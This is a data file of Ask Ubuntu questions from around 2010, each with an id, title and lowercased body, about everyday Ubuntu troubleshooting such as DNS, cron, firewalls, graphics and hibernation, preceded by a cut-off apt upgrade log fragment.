8.71.dfsg.1-0ubuntu5.2 , 8.71.dfsg.1-0ubuntu5.3 ) , tzdata ( 2010k-0ubuntu0.10.04 , 2010l-0ubuntu0.10.04 ) , ghostscript ( 8.71.dfsg.1-0ubuntu5.2 , 8.71.dfsg.1-0ubuntu5.3 ) , google-chrome-beta ( 6.0.472.33-r55501 , 6.0.472.51-r57639 ) , linux-libc-dev ( 2.6.32-24.39 , 2.6.32-24.41 ) , samba-common-bin ( 3.4.7~dfsg-1ubuntu3 , 3.4.7~dfsg-1ubuntu3.1 ) , upstart ( 0.6.5-6 , 0.6.5-7 ) , libdjvulibre-text ( 3.5.22-1ubuntu4 , 3.5.22-1ubuntu4.1 ) , language-pack-en-base ( 10.04+20100422 , 10.04+20100714 ) , binutils ( 2.20.1-3ubuntu6 , 2.20.1-3ubuntu7 ) , openjdk-6-jre ( 6b18-1.8-4ubuntu3 , 6b18-1.8.1-0ubuntu1 ) , language-pack-en ( 10.04+20100422 , 10.04+20100714 ) end-date : 2010-08-28 08:09:25
2316	how can i map a character to a key combination ?	i 'm a bit of a fan of the interrobang ( â˝ ) , but it obviously is not on my keyboard . how can i map that character to a key combination ?
2317	ureadahead seems to block the system on boot	i had a look at my bootcharts and something seems to be wrong with them . the ureadahead process does what it 's supposed to do ( disk utilisation is 100 % most of the time ) , but it also blocks any other action . since i 've got a slow , laptop harddrive , ureadahead itself takes ~50s of the boot time . then , the rest of the visible boot sequence takes another 100s to complete , using a lot of cpu , but not maxing it out and lots of io ( again , 100 % almost all the time ) . this seems just strange to me . is my ureadahead misconfigured ? why does it block tasks like bringing up the network which seems to be taking lots of cpu ? should it take ~50 % of the bootchart time in general ? edit : here is the example bootchart : http : //img191.imageshack.us/img191/1049/localhostkarmic20100815.png ( or this if the direct one did n't work : http : //yfrog.com/f/5blocalhostkarmic20100815p/ )
2319	can i use ubuntu ppas in sidux ?	i want to test sidux in dual-boot ! cause it is debianoid a question popped up : is ist possible to use ppas in sidux , too ?
2321	what is the proper way to change the dns ip ?	i suspect that the name server provided by my adsl modem/router is buggy . whenever i browse to a website for the first time in ubuntu , resolving the domain name takes at least 15 seconds . to work around that problem , i changed the nameserver configuration in /etc/resolv.conf from 192.168.1.1 ( my adsl modem ) to 8.8.8.8 ( google 's primary dns ) . this seems to fix the problem , but unfortunately my changes to /etc/resolv.conf are overwritten by `` networkmanager '' at each startup . what is the proper way to configure the name server ip in ubuntu 10.4 ?
2323	how do i troubleshoot sporadic hdmi failures ?	i 'm running hdmi video and audio from the on-board ati graphics output of a gigabyte ga-ma78gm-s2hp motherboard to an philips tv . it works fine , but every once in a while the screen will go blank and i ca n't seem to get it back without reseting the computer . the screen saver and power modes do n't seem to cause it and i tried disabling them to no avail . does anyone have any tips on how i could ( a ) reset the video output without a hard cpu reset , ( b ) gather more data to troubleshoot the problem and/or better yet ( c ) know what could be causing this issue ? i have replaced the 19 '' tv with a 24 '' hdmi monitor and have not had a reoccurrence of this problem since that time .
2332	how to start gnome session from chainroot ?	i have used cowbuilder to set-up a chainroot with ubuntu+1 ( essentially minimal ubuntu installation in a sub-folder , which you can `` change '' into , for example for building packages in a clean environment ) . how can i start gnome-session from there ? ideally i want it to appear on a new vt . i hope to achieve poor-man 's virtualisation ; - )
2336	thinkpad t60 flickering screen	i 'm running ubuntu 10.04 lts ( lucid lynx ) on my lenovo thinkpad t60 . i randomly get screen flickerings on my screen . once it happens , it does n't go away ( unless i reboot my computer ) . i would describe the flickering as horizontal color lines appearing throughout the screen where the text is difficult to read everywhere . i ran the following to see what video card is installed : $ lspci | grep vga 01:00.0 vga compatible controller : ati technologies inc radeon mobility x1400 my question is : what 's wrong and how do i fix it ?
2337	installing drivers for internet connectivity	i 'm having problems installing the drivers for internet connectivity from service provider . my computer recognizes the files when i insert the stick but does not want to install the drivers when i click on the .exe files .
2340	how do i get the kubuntu upgrade notification icon back ?	when kubuntu needs to be upgraded between versions ( e.g . 9.10 to 10.04 ) , there 's a notifier icon that shows up in the system tray , ( source ) but if i click on it to start the upgrade and it fails for some reason ( in my case , not enough space on the /boot partition ) , the icon disappears . how can i either get it back , or run the upgrade manually , without having to log out and log back in ?
2341	how to get rid of odd error line when alt+tab'ing away from an emacs launched in terminal	i have a very fresh install of lucid 10.04 64bit , fully upgraded , and with a raft of additional packages added . amongst them is emacs ( 23.1+1-4ubuntu7 ) . i habitually launch emacs from a terminal . i just observed that when i have the gui emacs ( i.e. , the result of running emacs not emacs -- nw ) and i alt + tab away from it , each press of alt + tab results in the line ** ( emacs:7690 ) : critical ** : murrine_style_draw_box : assertion `height > = -1 ' failed being output to my terminal window ( i assume it 's from the stderr of the emacs process ) . this did n't happen on jaunty 9.04 , for which i had the default jaunty emacs package installed . how to fix ?
2344	anyone get doom 3 audio working properly with ubuntu 10.04 ?	the audio configuration must have changed from 9.10 to 10.04 , because audio no longer seems to work with doom 3 . this was the suggested way to run doom 3 before , and it worked fine : doom3 +set s_alsa_pcm plughw:0 however , doom 3 is completely silent after i upgraded to ubuntu 10.04 . has anyone gotten the audio for doom 3 to work in lucid lynx ? edit : here 's some potentially useful console output : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- dlopen ( libasound.so.2 ) asoundlib version : 1.0.22 alsa is available -- -- -- alsa sound initialization -- -- - snd_pcm_open snd_pcm_stream_playback 'plughw:0 ' failed : device or resource busy dlclose warning : sound subsystem disabled edit2 : well , it seems that doom 3 is unable to share , like other applications , so closing rhythmbox and chrome and anything else that shows up in sound preferences under the applications tab worked . i would like to get it to play nice like everything else , but that may be too much to ask . if someone can come up with a solution that causes doom 3 to coexists peacefully with other applications would constitute an accepted answer . it sucks to have to close everything else first .
2345	where to file bugs/wishlist for unity ?	i guess the question explains it all ...
2348	is there a subethaedit-like text editor ?	is there a network-synchronized multi-user ide available in the ubuntu repositories ? if so , how did you find out about it ? this is not the sort of thing that has an easy-to-search-for name ...
2351	kqemu ppa for 10.04	where is a good ( working , no dependency issues ) ppa for qemu-kqemu and the kqemu module builder for ubuntu 10.04 ? a good ppa from which to obtain kqemu for 10.04 from would be one that has a working package with dependencies set to be handled correctly and that one can install without having to hold packages or override to keep qemu and kqemu at the ppa version . since upstream support is gone , updates are unlikely . please do n't suggest alternatives unless you can show they are faster than kqemu at disk i/o and networking on a vt-free machine . i am quite aware that kqemu development has been discontinued and that canonical has discontinued kqemu support , leaving vt-free users who need fast virtualization in the cold .
2352	vnc remote does n't work with ubuntu ?	i was wondering if anyone has a workaround for vnc remote not working with ubuntu running compiz . from what i can tell it works if i disable compiz effects , but who 's not a fan of eye candy ? anyway , it 's not a huge deal if there 's no work around anyone knows because i 've been using nx server instead to remote connect to my desktop . i was just wondering if there 's a way to get vnc working because i have an app on my ipod touch that can vnc , but there 's no nx client for the itouch .
2353	what 's the friendliest virtualization solution ?	i want to experiment with virtualization in ubuntu 10.04 and have found the following list of hopefully relevant names : xen , openvz , kvm , vservers , ec2 and solaris zones , although this is just a sample list and the question is not exclusive to these . from the community 's experience , what virtualization solution should i use on ubuntu to learn with ? factors are ease of setup , ease of use . stability is also important . secondary are memory usage and performance issues . what do i want to virtualize ? well , pretty much anything the chosen software will allow , under the banner of experimentation .
2354	fix laptop hard drive load cycles / kerchunking in desktop and laptop ubuntu 10.04 machines	how does one prevent the power-save load-cycling of a laptop hard drive in 10.04 in desktop and laptop machines ? these desktop and laptop machines with laptop hard drives have thousands of load cycles , already according to smartctl , and we do n't want them to die of kerchunking . laptop-mode-tools is , or was , somehow involved . the files have moved around and been refactored a good bit since i fixed this on 9.04 , and i ca n't seem to find the setting now .
2363	conveniently switch between apple and pc keyboard ( swap windows and alt keys )	i alternate between a unicomp clicky keyboard by day , and the apple bluetooth keyboard by night . the apple keyboard physically swaps the alt and windows keys . how do i counteract this ? also , how can i streamline the process since i switch keyboards twice per day .
2366	how do i manage users in proftpd ?	how do i add a new user to my ftp server running proftpd . i have the server running , i added a system user but i get login incorrect . thank you for your help in advance .
2368	how do i set up a cron job ?	how do i add cron jobs in ubuntu ?
2374	how can i optimise a server for a low latency application	i have an application that is latency sensitive . although i care about throughput , extreme low latency is more important to me . please suggest how i can optimise my server to achieve the lowest possible latency - that is , the lowest possible response time from a request being received on a network interface ( or inifiniband card ) and the response being published . initial thoughts are pin all operating system activity to a set of cores and dedicate others to my ( do n't know the best way to do this ) setting overcommit_memory to do n't overcommit the article optimizing servers and processes for speed seems to be a good start but other pointers are welcome . any other suggestions welcome
2379	how to speed up ssh login ?	from outside of my house , whenever i login to my ubuntu server using ssh , it takes about 6 seconds for me to get the prompt for password , however when i login to my web hosting server it takes about 1 second . what can i do to speed this up ? $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=8.04 distrib_codename=hardy distrib_description= '' ubuntu 8.04.1 '' $ ssh -v openssh_4.7p1 debian-8ubuntu1.2 , openssl 0.9.8g 19 oct 2007 $ cat /proc/cpuinfo model name : dual-core amd opteron ( tm ) processor 1210 cpu mhz : 1000.000 cache size : 1024 kb $ cat /proc/meminfo memtotal : 2074528 kb
2386	why tilda take long time to appear on my laptop ?	im using tilda on 2 computer , a desktop and a notebook , both with ubuntu ll 10.04 and compiz . the notebook has 6gb ram , 4 cpu 's ( core i3 330m ) @ 2,13ghz , and an ati radeon hd 5650 ( with ati closed drivers ) .. its a new notebook . the desktop has 2 cpu , 4gb ram and an intel graphic card.. its 5 years old . i dont know why , but when i show/hide tilda ( i use it in fullscreen mode with opacity ) , in the desktop show up instantly , instead in the notebook take 2~3 seconds . why the notebook is slower , even if it is more powerfull ? can be a matter of drivers/graphic card type , or there is some configuration i can check ? on both i did install tilda from ubuntu software sources . edit : i just noticed that it happens when i try to maximize every window ( a terminal , google chrome , gedit , etc.. ) , if i press f11 to maximize it : in the notebook it takes few seconds , in the desktop is instantly . could it be a compiz setting ?
2388	screen/power management during media use	is there a way to configure ubuntu so it does not activate the screen-saver , sleep-mode , suspend and/or hibernate while music or videos are being used ? i normally have to move once in a while the mouse while watching a movie to prevent this . btw , i use vlc for everything .
2389	generating list of manually installed packages and querying individual packages	i 'd like to get a list of packages installed manually by apt or aptitude and be able to find out whether a foobar package was installed manually or automatically . is there any neat way of doing that from the command line ?
2392	re-mapping keyboard keys	i am using a keyboard with the `` fn '' key . this is on a laptop . so my fn + up/down/left/right keys are mapped to brightness/volume . i would much rather them be mounted to page up/down , home/end . and map the other 4 keys to these 2 . the page up/down has fn+ them for home/end . its a shitty keyboard layout but i want to make it work . anyone knows how to figure out what the keycodes are and how to remap them ? version : 10.04 x32 so here are some experiments : using xmodmap -pke i discovered that keycodes 122 = vol down , 123 = vol up . and i got all the info for home/end/page up ( next ) , page down ( prior ) . now when using the vol up keys , there are no events being fired that xev can detect . i can remap the volume keys to xf86audiolowervolume or xf86audioraisevolume , but once i map those two to home/end ( respectively ) they do n't do anything . xev still does not pick up these events after a remap . remap : xmodmap -e `` keycode 122 = home ''
2399	how to turn off calling help on f1 ?	i am playing adom right now and under f1 button there is very aggressive tactic , which is extremaly useful when you are fighting on distance . right now i ca n't use it , because help dialog pops up . how can i turn it off ?
2401	has anyone got graphics working properly on 10.04 on a sony vaio p series ?	a fresh install gives me full native resolution but it 's still pretty unusable . scrolling a browser or page of text is so slow it 's forced me back to windows ( ! ) . youtube video is out of the question . i 've also tried netbook edition but same problems ( unsurprisingly ) . specifically , i have the sony vgn-p11z . cheers , matt
2405	nautilus does n't show my desktop until i kill it	something 's wrong with nautilus . when i boot my computer and it logs in , gnome shows , things are running , i can run programs and everything , but my desktop has no icons . i have to open a terminal and run killall nautilus and then suddenly everything works fine . how can i diagnose and fix this ? or , as a last resort , how might i create a script that runs at startup to automatically kill and restart nautilus ?
2408	where do i even start if hibernate / un-hibernate is slow ?	i 've been using ubuntu for about 8 months now , and the time it takes to un-hibernate seems to vary by minutes sometimes . i have n't been able to see a correlation between what 's open when it 's hibernated and how long it takes . i 'm wondering how to go about diagnosing this ? i spun off the question about timing the wakeup to a separate question .
2411	how do i find out which process is eating up my bandwidth ?	i think i 'm being the victim of a bug here . sometimes while i 'm working ( i still do n't know why ) , my network traffic goes up to 200 kb/s and stays that way , even tough i 'm not doing anything internet-related . this sometimes happens to me with the cpu usage . when it does , i just run a top command to find out which process is responsible and then kill it . problem is : i have no way of knowing which process is responsible for my high network usage . both the resource monitor and the top command only tell me my total network usage , neither of them tells me process specific network info . i 've found questions here about monitoring total bandwidth usage , but , as i mentioned , that 's not what i need . is there another command i can use to find out which process is getting out of hand ? the command iftop gives results that disagree entirely with the information reported by system monitor . while the latter claims there 's high network traffic , the former claims there 's barely 1 kb/s . i 've already tried killing all the obvious ones ( firefox , update-manager , pidgin , etc ) with no luck . so far , restarting the machine is the only way i found of getting rid of the issue .
2419	switching between graphics cards	i 've just bough an asus laptop which is equipped with two graphics cards ; one integrated in the intel i3 cpu and a radeon mobility hd5145 . will ubuntu switch between the cards to balance power/performance ? i.e . only use the radeon when the demands placed on the integrated card are too great ?
2424	connecting and copying files with scp -- ubuntu 10.04	i have a work computer . i have a home computer . i want to be able to share files between with scp , both our computers are behind routers , which assign a local ip . 198.168.0 . * as well as knowing their outside ip , i would like to know how to browse and share files and log in to one another with ssh , public keys as well please . please and thank you .
2428	how do i enable the ubuntu one tray applet ?	i am running 10.04 and i am unable to get a tray applet to appear for ubuntu one . i am sure there was an applet in 9.04 ( jaunty ) and 9.10 ( karmic ) . i have the package ubuntuone-client-gnome installed which synaptic tells me '' this package contains the tray applet and nautilus extension , providing integration with the gnome desktop . '' the applet is not on the `` add to panel ... '' list and there does n't appear to be anything in the menus . so how do i make the applet appear ?
2433	create a hamachi like nat based vpn tool	is there a tool like hamachi ( https : //secure.logmein.com/us/products/hamachi2 ) which works on ubuntu ? bonus points if it can be paired with something running on windows/mac .
2434	copying to two locations at the same time	i 'm not very fluent with bash ... what i 'd like to do is copy the content of a dvd-r to two different hard drives in the fastest possible way . ( ui-based solutions are welcome too ) thanks !
2436	how can i create a application launcher for a .sh file ?	i have this run.sh file , and i 've create a symbolic link into my desktop . when i double-click on it the file the following dialog appearsr and i have to click on `` run '' each time . how can i create a link that runs by default ?
2443	how to schedule a ruby script	i have a ruby script i 'd like to execute every 5 minutes or so . i have seen mention of cron tasks , but not in the context of executing ruby . i would like to know the steps necessary to execute the ruby script on a scheduled basis .
2444	disabling auto-open	how do i keep cd/usb automounting ( works fine ) but without auto-opening in nautilus ?
2447	trouble with ufw blocking stuff from nat machine to inside of nat	i 've got a nat box ( ubu 10.04 ) running ufw with the following sudo ufw status verbose : status : active logging : on ( low ) default : deny ( incoming ) , allow ( outgoing ) new profiles : skip to action from -- -- -- -- -- -- 22480/tcp limit in anywhere when i nmap -pn -p 22 192.168.0.0/24 to find all the sshes running on my nated ( working fine ) inside network , i get the following : starting nmap 5.00 ( http : //nmap.org ) at 2010-08-16 23:06 edt 0 ports scanned on 192.168.0.0 interesting ports on 192.168.0.1 : port state service 22/tcp closed ssh interesting ports on 192.168.0.2 : port state service 22/tcp filtered ssh interesting ports on 192.168.0.3 : port state service 22/tcp filtered ssh interesting ports on 192.168.0.4 : port state service 22/tcp filtered ssh ... continuing for all 254 ips ... note that there are not machines at those other ips ( 2 , 3 , 4 , ... ) . why is this ufw rule causing this ? ? why should a ufw input rule mess with the ability to nmap out from the router into the internal network ? that 's not an input , and ufw is set to the default config ( except as above ) of blocking input ports and not blocking output to ports . also , how can i get it to stop logging all the crap that is n't important that it receives ? i do want it to log stuff destined to my ip , but not broadcast traffic from windows machines on the outside ( routable ) network . the logging of this stuff is really making the logs huge .
2448	what ebook readers are available ?	can anyone suggest a nice ebook reader in ubuntu ? preferably something lightweight .
2449	ufw causing trouble with dhcp or wpa ?	it appears that enabling ufw is causing my network connection to drop periodically on a wpa-enterprise network , according to the network-manager gui app ( and the lack of a server response to web browsing for a minute or so while it is out ) . is this because ufw is preventing something needed for wpa or dhcp when configured with the defaults ?
2454	what im do you use to login into microsoft office communicator ?	i 've used pidgin , but it has n't worked 100 % , so maybe you know about something better ...
2455	how to make `` suspend '' option to work ?	in the power management , i selected the option called `` suspend when i close the lid '' . if i close the lid , the computer is not suspending . it keep itself on . how can i solve this problem ? thanks for the help
2456	quotation marks in ubuntu terminal	i 'm using ubuntu 9.04 as a guest in vmware . when i am using quotations marks in terminal , the first pressing of the key produces nothing , while the second one produces a double quotation mark looking like the ones from the keyboard , but different from the ones i already have in some text documents . what should i do ?
2458	how much space will the ubuntu 10.04 netbook take after installation ... ... is it compatible with the archos 9 ?	i wanted to install ubuntu on my archos 9 , which currently has win 7 starter , is it possible to get onscreen keyboard with d default key on archos ? ? how much space does the ubuntu take after installation ?
2461	why wo n't blizzard make starcraft 2 compatible with ubuntu ?	will this chicken-vs-egg problem of not having new top games for linux ever get solved ?
2465	is it possible to extend the disk space available to a wubi install ?	i installed ubuntu 10.04 using wubi . i now wish to allocate more disk space to my ubuntu install . is this possible ?
2470	clock stops ticking when inactive , causing drift	the clock applet drifts in time . clock is set to `` synchronize with internet ... '' so it is correct at startup , but then if i stay inactive for some time , may be 5 min as well as 1 hour , the clock stops ticking . if i start to be active again , then the clock applet moves again , but the time is now late . and it is not only the applet that is wrong , but the whole system date , because when i run date in a terminal , the time is also wrong . clarification : sorry , may be my question was not clear . here is my bug report to ubuntu : expected behaviour : clock-applet displays the correct time , observed behaviour : displayed time is drifting how to reproduce : if i get away from my computer for some times , the time displayed by the clock applet drifts . but the date command also show the wrong time . moreover , sleep interval also get wrong . to debug this , i tested the following script : # ! /bin/bash while [ [ true ] ] do date > > clocktest.log hwclock > > clocktest.log sleep 300 done must be run as root because of hwclock . il launched it : ./clocktest.sh & and got away from my computer here is the output log : 1 mardi 17 août 2010 , 12:42:12 ( utc+0200 ) 2 mar . 17 août 2010 12:42:13 cest -0.346882 secondes 3 mardi 17 août 2010 , 12:47:13 ( utc+0200 ) 4 mar . 17 août 2010 12:57:13 cest -0.080965 secondes 5 mardi 17 août 2010 , 12:52:13 ( utc+0200 ) 6 mar . 17 août 2010 13:02:14 cest -1.002776 secondes 7 mardi 17 août 2010 , 12:57:18 ( utc+0200 ) 8 mar . 17 août 2010 13:07:18 cest -0.063633 secondes 9 mardi 17 août 2010 , 13:02:18 ( utc+0200 ) 10 mar . 17 août 2010 13:12:19 cest -0.361501 secondes 11 mardi 17 août 2010 , 13:07:19 ( utc+0200 ) 12 mar . 17 août 2010 13:17:20 cest -0.987434 secondes line 1 and 2 show the first time through the loop . line 3 and 4 show the bug : while date ( and sleep ) thinks 5 minutes have elapsed , hwclock shows that 15 minutes have elapsed . line 5 to 12 shows normal behaviour , except now date is late by 10 minutes . behaviour is normal because i was back at my desk using the computer . having clock applet displaying the wrong time is one thing , but having the whole system time wrong ( since sleep gets confused too ) is a major bug . hardware : it is a fujitsu siemens amilo xi 2550 notebook . it was working fine with ubuntu 8.04
2471	how to hide users from the gdm login screen ?	i have recently added several new users , that i need for qmail . now they appear in the box in the login screen and clutter it , and i have to scroll to find my user . how can i hide those users from the login box ?
2473	how can i troubleshoot keryx 'unicodeencodeerror ' error ?	as it had been recommended here i tried to install keryx but i am getting following error and could not able to open up the software . here is the error message : ( keryx:4127 ) : gtk-warning ** : gmodule ( /usr/lib/gtk-2.0/2.10.0/i486-pc-linux-gnu/engines/libmurrine.so ) initialization check failed : gtk+ version too old ( micro mismatch ) fontconfig warning : `` /etc/fonts/conf.d/11-lcd-filter-lcddefault.conf '' , line 9 : invalid constant used : lcddefault fontconfig warning : `` /etc/fonts/conf.d/53-monospace-lcd-filter.conf '' , line 17 : invalid constant used : lcdlegacy traceback ( most recent call last ) : file `` < string > '' , line 132 , in < module > file `` keryx/build/pyi.linux2/keryx/outpyz1.pyz/lib.wxkeryx '' , line 49 , in start file `` keryx/build/pyi.linux2/keryx/outpyz1.pyz/wx._core '' , line 7912 , in __init__ file `` keryx/build/pyi.linux2/keryx/outpyz1.pyz/wx._core '' , line 7487 , in _bootstrapapp file `` keryx/build/pyi.linux2/keryx/outpyz1.pyz/lib.wxkeryx '' , line 27 , in oninit file `` keryx/build/pyi.linux2/keryx/outpyz1.pyz/lib.log '' , line 46 , in info unicodeencodeerror : 'ascii ' codec ca n't encode characters in position 0-8 : ordinal not in range ( 128 ) how can i solve this problem ? thanks a lot .
2484	what does examples.desktop do ?	what 's the point of the examples.desktop file ?
2493	what is the equivalent apt-get or aptitude command	is there an equivalent to the yum `` whatprovides '' option in apt-get ? for example on centos yum whatprovides /usr/share/gdm/themes/treeflower/background.png tells me redhat-logos-4.9.99-11.el5.centos.noarch : centos-related icons and pictures . repo : base matched from : filename : /usr/share/gdm/themes/treeflower/background.png can i get similar functionality on the command line in ubuntu ?
2495	how can i get firefox to use dolphin instead of nautilus ?	i am using dolphin as my file manager and when i download something via firefox , i right click the download dialog and choose `` open folder '' , i always get nautilus . why does n't firefox open the folder with dolphin ? thanks note : i tried adding the tag `` dolphin '' but because of my low rep i ca n't create new tags : (
2501	how to seamlessly connect two lan 's ?	i 'm going to connecting two lan 's in some way , i imagine some form of vpn tunnel between the gateway/router on each side . both routers have ubuntu-server 10.04 installed , but the only vpn-like experience i have is setting on-demand tcp-port forwarding with ssh , but i want this to work for windows clients as well . the two networks are only connected through an internet connection , and i do n't want my private traffic exposed ( traffic like samba ) . so how can i do this ?
2502	where can i get themes and eye-candy for my desktop ?	apart from those themes in the repository and gnome-look.org , are there other places to get themes for my ubuntu desktop ? also , are there any 3rd party repositories of themes and other eye-candy ?
2507	is there a wine version of flash as a plugin to firefox or chrome ?	i 've seen complaints about flash performance . would it be possible to use wine as a plugin to firefox in order to get better performance out of flash ? ( hopefully wine would utilize some sort of hardware optimizations ) would using wine even give better performance ?
2508	convert flv for playback on ipad	i like to watch flv videos during downtimes using my ipad . whats a good tool for converting video files and then tossing them onto the ipad . primarily i 've grabbed a few flv tutorials off you tube . i know ffmpeg can do the transform , but it 's got one of those `` needs a phd in video '' to sort out ...
2516	degenerate and missing icons in upper right menu bar	this applies specially for the battery and the power-off icon . the power-off icon is missing , but it is possible to reach that menu by dragging sideways , if i first open the menu to the left of it . the battery icon is sometimes duplicated , with the one on the left being the one that works and that in random variations . this seemed to start happening after i installed sdlball , ( if i remember the name right ) a breakout game in full screen mode , though i am not absolutely sure that it is the problem . i run 64 bit lynx on dual boot with vista on a thinkpad , in case that 's relevant . any clues on a cause or a remedy ?
2517	how to log-in via tty by instead of gdm ?	i want my ubuntu box to boot directly into a tty login screen and after it does that i want it to automatically run startx how would i go about doing this ?
2522	google talk video chat	there are no video chat plugins supplied by google for ubuntu . they are availabe just for pc and mac . are there any alternatives ? update : google has launched official video chat plugin for linux http : //www.google.com/chat/video http : //gmailblog.blogspot.com/2010/08/use-linux-now-you-can-video-chat-too.html
2528	aliases : difference between .bash_rc , .bash_aliases and /usr/local/bin	playing around with terminal , i noticed that there are many ways to create permanent aliases . i 'm a linux newbie , and from what i know , doing : sudo ln -s /path/to/esecutable /usr/local/bin/desired_alias adding desired_alias = '/path/to/executable ' to ~/.bashrc uncommenting those lines in ~/.bashrc : if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi and putting desired_alias = '/path/to/executable ' into the ~/.bash_aliases all have the same effect . what is the difference between the first and second methods ?
2536	my toshiba 's fans do not work automatically	my toshiba satellite m505-s4940 's fans do not turn on automatically , so it was overheating before i learned how to do it manually by using this keyboard-shortcut : fn+f3 i have to do this every time i use my computer ! i really like the performance of ubuntu , and i just began to use and love it , but i would like to solve this problem . hopefully someone can help me , and sorry about my english . it is not my native language : )
2538	how to automate starting terminal instances for specific tasks	i 'm going through some programming tutorials and for every session , i have to start up at least 3 terminal windows ( one for a log file tail , one for testing output , one for running various shell commands in , etc . ) right now i start them all up manually : click the terminal icon , cd to the right folder , type in the commands , and change the window title to something meaningful . is there a way to write up a script or something that would automate that for me ? and if so , how ? ( i 'm cool with not getting a complete script as an answer . a pointer where to start reading would work too . )
2540	access windows 7 media streaming	i wish to be able to see and stream music to my ubuntu 10.04 installation through rhythmbox . i have enabled media streaming in windows 7 and i can see rhythmbox as an allowed device . i have installed the coherence plugin for rhythmbox . i can see my windows 7 pc under the shared folder in rhythmbox , but i do not see any of my music . is there a step along the way that i missed or something else that i have to enable ?
2544	where is the flash in chrome ?	i installed google chrome . this is the first thing i did after installing ubuntu . i went into firefox , and went to chrome.google.com , and hit the button . i do n't like package managers , and avoid the command line like the pox . then , i started using google chrome . i went to kongregate , and clicked on a game . it told me i did n't have flash . a few different websites told me the same . i assumed that they must have been wrong . i hit the link to adobe , to install flash , and it reassured me ; of course , google chrome includes flash . i checked my version - chrome 5.0.375.126 . of course , i just downloaded it . i scoured the internet for solutions . none worked . many seemed to involve re-enabling flash , or something like that . but insofar as i can tell , there is no flash anywhere in my chrome . i feel like i bought a reese 's cup , and found solid chocolate . i checked in the chrome plugin manager , and everything . a few solutions told me to copy some garbage into my command line and hit enter ( as almost all solutions to problems on linux entail ) . i did it , reluctantly , and it did nothing . i thought flash was supposed to come with chrome . but it did n't . sooooo ... what gives ? google chrome version : google chrome 5.0.375.126 ( official build 53802 ) webkit 533.4 v8 2.1.10.15 user agent mozilla/5.0 ( x11 ; u ; linux x86_64 ; en-us ) applewebkit/533.4 ( khtml , like gecko ) chrome/5.0.375.126 safari/533.4 command line /opt/google/chrome/google-chrome operating system : ubuntu 10.4 64 bit .
2547	is it possible to view pdfs right in chrome without downloading them first ?	when i click a link to a pdf in chrome instead of displaying the pdf in the browser i see a blank page with `` missing plugin '' written over it . is it possible to get this plugin somewhere or am i condemned to downloading the pdf first and then displaying it using standard pdf viewing software ?
2554	is live video chat with msn/windows possible ?	is this currently possible in either lucid or maverick ?
2557	thinkpad middle button scrolling	i 'm running ubuntu on my thinkpad t60 . is there a way to get the middle button to act like a scroll like it would when it runs windows ? i 'd like to be able to hold the middle button down and scroll down a webpage using the red button .
2558	how do i restore a linux boot partition ?	first of all , i 'm a linux noob ( i 've been using linux for a about four-five years , but only fixed problems as i got them though usually i just reinstalled everything ) . i have recently installed kubuntu 9.04 , then upgraded to the latest kubuntu ( 10.4 ) . everything went smooth and i have used it ok for about two weeks . after the latest security/bugfixes update , the bootloader got corrupted . my questions : can i restore it from the 9.04 boot cd/dvd , or do i need a special rescue system ? should i get a new live dvd for 10.4 and fix it from there ? also , what do i need to actually fix ? what utilities do i need ? ( what should my steps be ? ) thanks : )
2567	can i default bluetooth to off on my laptop lenovo t61	after every boot bluetooth is on by default . i only very occasionally use bluetooth so i would really like this to be defaulted to off but be able to start it without a reboot or some command line change which i probably wont remember in 4 months time when i need it . any help greatly appreciated
2572	how to live boot old hardware diskless ?	can you tell whether i got a harddrive or software issue ? a new system removed harddrives can boot and write a cd . now i try to make old hardware work likewise , try boot with 32-bit 10.04 and following messages appears : initramfs can not mount /dev/loop0 ( /cdrom/casper/filesystem.squashfs also having tried quite a few other systems and distros ( bsd , haiku , mandriva ) to boot the connected components ( which seem physically ok ) none can boot my old hardware . any ideas ? thanks
2573	can i use my computer as an a2dp receiver ?	first , the problem : i 'm using a cowon mp3 player as my main music player with basic earplugs . it offers a2dp & i 'd like to have my netbook ( running une 10.04 ) act as receiver . some resources on the web about a2dp , but most are out of date : http : //fosswire.com/post/2008/10/better-bluetooth-audio/ http : //jprvita.wordpress.com/2009/12/15/1-2-3-4-a2dp-stream/ http : //dpillay.wordpress.com/2010/09/27/ubuntu-10-04-a2dp-awesome-headset-music/
2578	how to stop acpid restarting /etc/acpi/lid.sh restart unnecessarily ?	on my acer aspire one netbook , i have noticed that acpid starts /etc/acpi/lid.sh multiple times a minute . this script should only be started when the lid is closed or opened . how can i stop theses unnecessary starts from happening without switching off acpi or disabling the lid event ?
2580	netbook remix goes to low graphics mode after booting up from hibernate	i am using an asus 1005p netbook . what happens is when i wake up the machine from hibernate state , a while later x crashes and goes to low graphics mode . i stumbled on solutions in ubuntuforums but none of them seem to work : http : //ubuntuforums.org/showthread.php ? t=1498447 does anyone have another solution for this ?
2582	can i log how long resume ( un-hibernate ) takes ?	this question has been spun off from my question about hibernate being slow . i know i can run a script when i resume the computer by putting it in /etc/acpi/resume.d , but that will only run it once . what i was hoping for was a `` starting wakeup '' script and a `` finished wakeup '' script , so each one would log it 's time somewhere and i could see how long resume works . i figure this is a long shot , since the `` starting wakeup '' script would have to run really early , so even if it was possible , there might not be a disk to write to .
2586	ca n't seem to get my login screen back after installing slim	at one point i switched from gdm to slim and now i ca n't seem to get past the splash screen . after pressing esc i can see that it is stuck on starting x display manager : slim . i need to get back to gdm or just figure out what it is doing . thoughts ?
2587	multiple terminal windows	i develop code . i use terminal alot . i use many terminal windows alot . i hate how tabs look . any useful applications that allow for multiple terminal use , and streamline my development . allow me to keep multiple terminals in focus ? please and thank you .
2593	is there a way to check hardware integrity ?	i know how to check hard disk integrity , and how to check ram integrity ( with live cd ) , but is there a way to check if others hardware is working well or is broken ? for example graphic card , audio card , etc.. ? i 'm not trying to check in an hardware works well with ubuntu ( aka driver question ) , i need to check if an hardware is broken or not
2596	comparison of backup tools	this question exists because it has historical significance , but it is not considered a good , on-topic question for this site , so please do not use it as evidence that you can ask similar questions here . while you are encouraged to help maintain its answers , please understand that `` big list '' questions are not generally allowed on ask ubuntu and will be closed per the help center . backup is incredibly important . obviously there 's no best backup tool , but a comparison of the options would be very interesting . ( i 've made this a community wiki ) graphical interface ? command line ? incremental backups ? automatic backups ? install method : in standard repositories ? ppa ?
2597	no menu when trying to run codeblocks	i installed codeblocks but the gui is not displaying well . there is no file , edit , view , search , project etc but everything else is there . i am running 9.10 .
